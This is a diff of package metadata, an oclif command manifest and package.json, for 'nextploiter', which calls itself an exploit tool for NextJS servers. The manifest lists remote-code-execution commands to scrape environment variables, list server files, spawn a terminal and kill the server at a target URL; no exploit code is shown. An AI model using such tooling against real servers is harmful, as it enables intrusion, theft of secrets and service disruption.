+      "hasDynamicHelp": false,
+      "hiddenAliases": [],
+      "id": "rce:kill-server",
+      "pluginAlias": "nextploiter",
+      "pluginName": "nextploiter",
+      "pluginType": "core",
+      "strict": true,
+      "isESM": false,
+      "relativePath": [
+        "dist",
+        "commands",
+        "rce",
+        "kill-server.js"
+      ]
+    },
+    "rce:list-env": {
+      "aliases": [],
+      "args": {},
+      "description": "Helper that iterates through process.env to scrape all environment variables.",
+      "flags": {
+        "baseURL": {
+          "name": "baseURL",
+          "required": true,
+          "hasDynamicHelp": false,
+          "multiple": false,
+          "type": "option"
+        }
+      },
+      "hasDynamicHelp": false,
+      "hiddenAliases": [],
+      "id": "rce:list-env",
+      "pluginAlias": "nextploiter",
+      "pluginName": "nextploiter",
+      "pluginType": "core",
+      "strict": true,
+      "isESM": false,
+      "relativePath": [
+        "dist",
+        "commands",
+        "rce",
+        "list-env.js"
+      ]
+    },
+    "rce:list-files": {
+      "aliases": [],
+      "args": {},
+      "description": "Helper to list all files in the server. May not work for serverless systems.",
+      "flags": {
+        "baseURL": {
+          "description": "Base URL of server to attack",
+          "name": "baseURL",
+          "required": true,
+          "hasDynamicHelp": false,
+          "multiple": false,
+          "type": "option"
+        },
+        "dir": {
+          "description": "Directory for ls command",
+          "name": "dir",
+          "default": ".",
+          "hasDynamicHelp": false,
+          "multiple": false,
+          "type": "option"
+        }
+      },
+      "hasDynamicHelp": false,
+      "hiddenAliases": [],
+      "id": "rce:list-files",
+      "pluginAlias": "nextploiter",
+      "pluginName": "nextploiter",
+      "pluginType": "core",
+      "strict": true,
+      "isESM": false,
+      "relativePath": [
+        "dist",
+        "commands",
+        "rce",
+        "list-files.js"
+      ]
+    },
+    "rce:spawn-terminal": {
+      "aliases": [],
+      "args": {},
+      "description": "Helper that spawns a terminal.",
+      "flags": {
+        "baseURL": {
+          "name": "baseURL",
+          "required": true,
+          "hasDynamicHelp": false,
+          "multiple": false,
+          "type": "option"
+        }
+      },
+      "hasDynamicHelp": false,
+      "hiddenAliases": [],
+      "id": "rce:spawn-terminal",
+      "pluginAlias": "nextploiter",
+      "pluginName": "nextploiter",
+      "pluginType": "core",
+      "strict": true,
+      "isESM": false,
+      "relativePath": [
+        "dist",
+        "commands",
+        "rce",
+        "spawn-terminal.js"
+      ]
+    }
+  },
+  "version": "0.0.0"
+}

package/package.json

@@ -0,0 +1,77 @@
+{
+  "name": "nextploiter",
+  "description": "Exploit tool for NextJS. Contribute at github. https://github.com/vonuyvicoo/nextploiter",
+  "version": "0.0.0",
+  "author": "Von Uyvico",
+  "bin": {
+    "nextploiter": "./bin/run.js"
+  },
+  "bugs": "https://github.com/vonuyvicoo/nextploiter/issues",
+  "dependencies": {
+    "@oclif/core": "^4",
+    "@oclif/plugin-help": "^6",
+    "@oclif/plugin-plugins": "^5",
+    "form-data": "^4.0.5",
+    "localtunnel": "^2.0.2",
+    "loclx": "^24.4.1",
+    "node-fetch": "^3.3.2",
+    "node-tcp-proxy": "^0.0.28",
+    "react-server-dom-webpack": "^19.2.3"
+  },
+  "devDependencies": {
+    "@eslint/compat": "^1",
+    "@oclif/prettier-config": "^0.2.1",
+    "@oclif/test": "^4",
+    "@types/chai": "^4",
+    "@types/localtunnel": "^2.0.4",
+    "@types/mocha": "^10",
+    "@types/node": "^18",
+    "chai": "^4",
+    "eslint": "^9",
+    "eslint-config-oclif": "^6",
+    "eslint-config-prettier": "^10",
+    "mocha": "^10",
+    "oclif": "^4",
+    "shx": "^0.3.3",
+    "ts-node": "^10",
+    "typescript": "^5"
+  },
+  "engines": {
+    "node": ">=18.0.0"
+  },
+  "files": [
+    "./bin",
+    "./dist",
+    "./oclif.manifest.json"
+  ],
+  "homepage": "https://github.com/vonuyvicoo/nextploiter",
+  "keywords": [
+    "oclif"
+  ],
+  "license": "MIT",
+  "main": "dist/index.js",
+  "oclif": {
+    "bin": "nextploiter",
+    "dirname": "nextploiter",
+    "commands": "./dist/commands",
+    "plugins": [
+      "@oclif/plugin-help",
+      "@oclif/plugin-plugins"
+    ],
+    "topicSeparator": " ",
+    "topics": {
+      "hello": {
+        "description": "Say hello to the world and others"
+      }
+    }
+  },
+  "repository": "vonuyvicoo/nextploiter",
+  "types": "dist/index.d.ts",
+  "scripts": {
+    "build": "shx rm -rf dist && tsc -b",
+    "lint": "eslint",
+    "posttest": "pnpm run lint",
+    "test": "mocha --forbid-only \"test/**/*.test.ts\"",
+    "version": "oclif readme && git add README.md"
+  }
+}